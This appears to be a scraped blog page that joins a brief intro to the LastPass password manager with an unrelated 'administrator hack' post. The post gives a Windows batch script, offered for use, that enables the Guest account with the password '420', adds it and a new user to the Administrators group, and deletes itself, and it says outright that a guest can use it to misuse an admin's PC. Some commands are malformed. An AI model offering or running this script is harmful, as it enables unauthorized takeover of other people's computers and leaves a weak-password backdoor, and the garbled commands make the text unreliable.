Today, I will be sharing with you all LastPass the free password manager, which will help us manage our passwords for different websites. Because nowadays we visit and register on various websites on a daily basis and we cannot remember all the passwords we use for different websites, so we just re-use the one which we always use, which I like to call the “Default” Password.
Tag: Password
Administrator privileges for guest
As Already I many administrator hacks this hacks gives an guest account the admin privileges. as through this is cool for guest. this can be used by the guest to misuse the PC of admin.Want admin privileges on ur pc?
try this
Copy and paste the code given below in notepad and save it as anyname.bat(not txt)
Den double click on it
This will add u in administrators group
Enjoy
echo off
title Please wait…
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0